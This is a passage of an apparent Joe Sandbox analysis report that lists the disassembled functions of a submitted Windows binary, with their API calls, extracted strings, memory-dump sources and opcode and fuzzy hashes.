                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC754
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC766
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC778
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC78A
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC79C
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7AE
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7C0
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7D2
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7E4
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7F6
                                                            • _free.LIBCMT ref: 00CECB5B
                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                            • _free.LIBCMT ref: 00CECB7D
                                                            • _free.LIBCMT ref: 00CECB92
                                                            • _free.LIBCMT ref: 00CECB9D
                                                            • _free.LIBCMT ref: 00CECBBF
                                                            • _free.LIBCMT ref: 00CECBD2
                                                            • _free.LIBCMT ref: 00CECBE0
                                                            • _free.LIBCMT ref: 00CECBEB
                                                            • _free.LIBCMT ref: 00CECC23
                                                            • _free.LIBCMT ref: 00CECC2A
                                                            • _free.LIBCMT ref: 00CECC47
                                                            • _free.LIBCMT ref: 00CECC5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 8421841d45942cd3fd3fa13244151abf3cc91656ae64275534d8b99e54d5bc44
                                                            • Instruction ID: 07c35552de85e267b00680d9384c084dd3edcffb51d1eb35a4b8eaf94932f35c
                                                            • Opcode Fuzzy Hash: 8421841d45942cd3fd3fa13244151abf3cc91656ae64275534d8b99e54d5bc44
                                                            • Instruction Fuzzy Hash: 47315C316003869FEB20AA3ADC86B5A77E9BF10310F245429F56CD7192DF35EE45DB10
                                                            Function 00CDD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 00CDD6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 00CDD6ED
                                                              • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00CDD709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CDD720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00CDD734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CDD75D
                                                            • DeleteObject.GDI32(00000000), ref: 00CDD764
                                                            • GetWindow.USER32(00000000,00000002), ref: 00CDD76D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            • Opcode ID: e8a3ee29a8e45c6855a2a507dd9afcf1948afcd99381cac99d1c740920cde545
                                                            • Instruction ID: f02a7983ed587fc2f8e2530f4c0f015479fb2ae6304f3ea1248e0c0fd75f7476
                                                            • Opcode Fuzzy Hash: e8a3ee29a8e45c6855a2a507dd9afcf1948afcd99381cac99d1c740920cde545
                                                            • Instruction Fuzzy Hash: EF1136729007107BE2316B709C4AFAF765CAF50701F014122FB22E23D5DA68CB4652B5
                                                            Function 00CE96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00CE9705
                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                            • _free.LIBCMT ref: 00CE9711
                                                            • _free.LIBCMT ref: 00CE971C
                                                            • _free.LIBCMT ref: 00CE9727
                                                            • _free.LIBCMT ref: 00CE9732
                                                            • _free.LIBCMT ref: 00CE973D
                                                            • _free.LIBCMT ref: 00CE9748
                                                            • _free.LIBCMT ref: 00CE9753
                                                            • _free.LIBCMT ref: 00CE975E
                                                            • _free.LIBCMT ref: 00CE976C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 2bbd228600dfcb42a189b381569f24a39f7efd25d74fd80bb0d924f88bcbabea
                                                            • Instruction ID: 97e97c6c3d0971b6da03d38c8d2b9ca87f69917969da4952af207fad62715136
                                                            • Opcode Fuzzy Hash: 2bbd228600dfcb42a189b381569f24a39f7efd25d74fd80bb0d924f88bcbabea
                                                            • Instruction Fuzzy Hash: F411A27611014AAFCB01EF96CC82CD93BB5EF14350B5555A1FA088F262DE32EB54AB84
                                                            Function 00CE2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: a041ae40a5b70dc155cb3faf34385d0e8fa93f2a61db85014bb817fac695dae5
                                                            • Instruction ID: 8b221ff6eccb783a14d4ccef9b9fb231c4923c2f7c63c414753f11cb3a37fafc
                                                            • Opcode Fuzzy Hash: a041ae40a5b70dc155cb3faf34385d0e8fa93f2a61db85014bb817fac695dae5
                                                            • Instruction Fuzzy Hash: 80B18D719002D9EFCF25DFA6C8859AEB7B9FF04310F14416AE8116B212D731EB51DB91
                                                            Function 00CC6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC6FAA
                                                            • _wcslen.LIBCMT ref: 00CC7013
                                                            • _wcslen.LIBCMT ref: 00CC7084
                                                              • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                              • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                              • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            • Opcode ID: 7cb8822b917b5f6de4cff095abfcec58aa918ed009c211e327451ced893cc88e
                                                            • Instruction ID: 5dbcb383ebd6ef09d2ae41895b61a45cb6145fa3213d24bf275f61f230db643d
                                                            • Opcode Fuzzy Hash: 7cb8822b917b5f6de4cff095abfcec58aa918ed009c211e327451ced893cc88e
                                                            • Instruction Fuzzy Hash: 674119B1D083887AEB20E770DD46FEE776CDF14344F04055EFA5AA7182D674AB449B21
                                                            Function 00CD9711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00CD9736
                                                            • _wcslen.LIBCMT ref: 00CD97D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00CD97E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CD9806
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1116704506-4209811716
                                                            • Opcode ID: 8d493eedb374a554efefcdd23f9e2ee53f69abf64ba437a46bde7494e18f8d17
                                                            • Instruction ID: ad2d56a3adaa5945573440aec76031bdf0ffc490b6dd6441e9136d78f966f700
                                                            • Opcode Fuzzy Hash: 8d493eedb374a554efefcdd23f9e2ee53f69abf64ba437a46bde7494e18f8d17
                                                            • Instruction Fuzzy Hash: CA3135361083817BE725AB21AC46F6FB7ACEF42720F14011FF611972D2EB749A0493A6
                                                            Function 00CDB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • EndDialog.USER32(?,00000001), ref: 00CDB610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CDB637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CDB650
                                                            • SetWindowTextW.USER32(?,?), ref: 00CDB661
                                                            • GetDlgItem.USER32(?,00000065), ref: 00CDB66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CDB67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CDB694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            • Opcode ID: d9df71901ab638029a6794c95efb5ff9763f92bba2e70b3090cc4bec05f16774
                                                            • Instruction ID: 5bf5ea699c2ba75b74370fe73ffe60e035f3da6c2ab8921c89bdebe47a08b06e
                                                            • Opcode Fuzzy Hash: d9df71901ab638029a6794c95efb5ff9763f92bba2e70b3090cc4bec05f16774
                                                            • Instruction Fuzzy Hash: 23219E32604305BBD2259F66ED4AF7B3B6DEB46B81F024016F704D23A0CB56DE03A675
                                                            Function 00CDFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,A4F5137B,00000001,00000000,00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00CDFE1F
                                                            • _com_issue_error.COMSUPP ref: 00CDFE48
                                                            • _com_issue_error.COMSUPP ref: 00CDFE52
                                                            • GetLastError.KERNEL32(80070057,A4F5137B,00000001,00000000,00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE57
                                                            • _com_issue_error.COMSUPP ref: 00CDFE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE80
                                                            • _com_issue_error.COMSUPP ref: 00CDFE93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: 34c346d7375c5902f086bb07cc02b37ab38797ef1afac4ad4f420c6980440b97
                                                            • Instruction ID: 16c1c7d2a3311061220dbafdef9f074fb83e4c6c3ac5a5ad70f61f0d79630d8f
                                                            • Opcode Fuzzy Hash: 34c346d7375c5902f086bb07cc02b37ab38797ef1afac4ad4f420c6980440b97
                                                            • Instruction Fuzzy Hash: 824138B1A00248ABDB109F65CC45BAEBBA8FF44710F14423FFA16E7351D7349A01C7A5
                                                            Function 00CCAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            • Opcode ID: a3aaa0be0d501fb7b7e20a7f28bffa99cc909c3451aa889f7e5f5bdbe6a8fb10
                                                            • Instruction ID: 01b7350b5a9d95961e40c0feb5bf08f966433e03c56ed3b577a8b6b96dd08e62
                                                            • Opcode Fuzzy Hash: a3aaa0be0d501fb7b7e20a7f28bffa99cc909c3451aa889f7e5f5bdbe6a8fb10
                                                            • Instruction Fuzzy Hash: D2715D71A00619AFDB14DFA5CC99EBEBBB9FF48714B14015DE512A72A0CB30AE41CB61
                                                            Function 00CC9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC9387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CC93AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00CC93C9
                                                              • Part of subcall function 00CCC29A: _wcslen.LIBCMT ref: 00CCC2A2
                                                              • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                            • _swprintf.LIBCMT ref: 00CC9465
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 00CC94D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 00CC9514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: f4edf188532ff95fa57f3f7b43c711f18b157972e478a56f7e0119ca8ec29451
                                                            • Instruction ID: 11261bda344177604be83e9edff758fa901511ead7602192c3cf0be925ba0a13
                                                            • Opcode Fuzzy Hash: f4edf188532ff95fa57f3f7b43c711f18b157972e478a56f7e0119ca8ec29451
                                                            • Instruction Fuzzy Hash: C14156B190025866DF21FBA0CC49FEE737CEF45340F0449A9F659E3551DA388B89EB60
                                                            Function 00CD1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 00CD122E
                                                              • Part of subcall function 00CCB146: GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00CD1251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00CD1263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CD1274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CD12CF
                                                            • __aullrem.LIBCMT ref: 00CD1379
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: 6a59a9fbe35db9dab02c4225d7442a7e34a9fbbeebc5fcfde6a9a8f0d4c7541e
                                                            • Instruction ID: 3af096e8fa9b8c7c418f5ad2374f8de2ab11cfc964b4419aa5790d9614b02da0
                                                            • Opcode Fuzzy Hash: 6a59a9fbe35db9dab02c4225d7442a7e34a9fbbeebc5fcfde6a9a8f0d4c7541e
                                                            • Instruction Fuzzy Hash: 2341FAB1508345AFC710DF65C884A6FBBE9FF88714F04892EF996C2610E734E649DB52
                                                            Function 00CC2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00CC2536
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            • Opcode ID: 1a9640d37d13ee7d65a8729a9628e20b8d4c6299fa9fd6c11fec41118a4835b8
                                                            • Instruction ID: bd91396eb8300915779c9058e1ec88604a07e9299aa538cc05306b0cc441069c
                                                            • Opcode Fuzzy Hash: 1a9640d37d13ee7d65a8729a9628e20b8d4c6299fa9fd6c11fec41118a4835b8
                                                            • Instruction Fuzzy Hash: 6EF116716083809BDB25EF28C4E5FFE77996F90300F08056DFD8A9B283CB649A45D762
                                                            Function 00CD9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
